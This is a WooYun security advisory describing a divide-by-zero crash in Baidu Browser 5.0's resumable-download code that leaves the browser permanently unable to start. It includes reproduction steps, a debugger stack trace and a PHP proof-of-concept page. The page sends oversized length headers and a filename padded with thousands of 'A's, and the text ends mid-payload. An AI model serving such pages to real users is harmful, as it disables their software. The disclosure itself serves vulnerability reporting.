
Vulnerability summary

Defect ID: wooyun-2013-037842

Title: Baidu Browser 5.0 release: divide-by-zero exception causes a permanent denial of service

Vendor: Baidu

Author: blast

Submitted: 2013-09-23 12:04

Fix time: 2013-12-22 12:04

Disclosed: 2013-12-22 12:04

Type: Denial of service

Severity: Low

Self-assessed Rank: 5

Status: Confirmed by vendor

Source: http://www.wooyun.org; for questions or help, contact [email protected]



Vulnerability details

Disclosure status:

2013-09-23: Details sent to the vendor, awaiting vendor handling
2013-09-23: Vendor confirmed; details visible to the vendor only
2013-09-26: Details opened to third-party security partners
2013-11-17: Details opened to core white hats and domain experts
2013-11-27: Details opened to regular white hats
2013-12-07: Details opened to intern white hats
2013-12-22: Details disclosed to the public

Brief description:

Resumable-download handling is not thought through: xnet!AcquireAsynHttpService+0x2790b (div eax,ecx) raises a divide-by-zero exception. Open the page once and Baidu Browser can never be used again.
Exception Code: 0xC0000094 (EXCEPTION_INT_DIVIDE_BY_ZERO)

Detailed description:

Steps to reproduce:
1. Open the page a.php (source in Proof 1).
2. Click download, do not pause, then close the browser.

[screenshot: f1.png]

[screenshot: f2.png]

3. After the user has closed the browser, the content served by a.php changes, for example to Proof 2.
4. Reopen the browser. The resume logic in xnet!AcquireAsynHttpService starts working; since what the server now returns is smaller than before, and not a single byte of the file has been downloaded yet, it re-fetches the size and then computes a percentage. That is my guess.
5. A lovely divide-by-zero exception.

[screenshot: f3.png]

Because this synchronisation runs every time the browser starts, as long as this entry remains in the download list the browser can never start successfully, unless you uninstall it and also delete the user profile.
(fe8.4e8): Integer divide-by-zero - code c0000094 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Program Files (x86)\baidu\BaiduBrowser\xnet.dll -
xnet!AcquireAsynHttpService+0x2790b:
5bc4b51b f7f1 div eax,ecx
0:033:x86> k
ChildEBP RetAddr
WARNING: Stack unwind information not available. Following frames may be wrong.
0ae9f864 5bc15b4e xnet!AcquireAsynHttpService+0x2790b
0ae9f88c 5bc14817 xnet+0x25b4e
0ae9f8b4 5bc11581 xnet+0x24817
0ae9f8ec 5bc07a08 xnet+0x21581
0ae9f908 5bc04df0 xnet+0x17a08
0ae9f934 5bc05a98 xnet+0x14df0
*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Program Files (x86)\baidu\BaiduBrowser\bdcommon.dll -
0ae9f968 5e7128a3 xnet+0x15a98
0ae9f974 5e712b4b bdcommon!Util::Help::GetMimeTypeByExt+0x33c2
0ae9f9b0 5e7124d5 bdcommon!Util::Help::GetMimeTypeByExt+0x366a
0ae9f9e0 5e70fdea bdcommon!Util::Help::GetMimeTypeByExt+0x2ff4
0ae9f9f4 5e70fcad bdcommon!Util::Help::GetMimeTypeByExt+0x909
0ae9fa20 5e710d18 bdcommon!Util::Help::GetMimeTypeByExt+0x7cc
0ae9fa28 5e713159 bdcommon!Util::Help::GetMimeTypeByExt+0x1837
0ae9fa60 5e7135c9 bdcommon!Util::Help::GetMimeTypeByExt+0x3c78
0ae9fa68 5e71ca16 bdcommon!Util::Help::GetMimeTypeByExt+0x40e8
0ae9faa0 5e71caa0 bdcommon!Util::Common::Timer::EraseTimerCallback+0x58e5
0ae9faac 753f336a bdcommon!Util::Common::Timer::EraseTimerCallback+0x596f
0ae9fab8 77709f72 kernel32!BaseThreadInitThunk+0xe
0ae9faf8 77709f45 ntdll32!__RtlUserThreadStart+0x70
0ae9fb10 00000000 ntdll32!_RtlUserThreadStart+0x1b

Proof of vulnerability:

Proof 1 (PS: I removed some of the A's from the proof... I reckon it does not affect the result; if it does not work, add more A's...):

<?php
header("Content-type: application/octet-stream"); // the returned file
header("Accept-Ranges: bytes"); // serve byte ranges
header("Accept-Length: 899999999999999999999999999999999999989999999999999999999999999999999999998999999999999999998999999999999999999999999999999999999899999999999999999999999999999999999989999999999999999989999999999999999999999999999999999998999999999999999999999999999999999999899999999999999999"); // returned file size
header("Content-Length: 899999999999999999999999999999999999989999999999999999999999999999999999998999999999999999998999999999999999999999999999999999999899999999999999999999999999999999999989999999999999999989999999999999999999999999999999999998999999999999999999999999999999999999899999999999999999"); // returned file size
header("Content-Disposition: attachment; filename=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA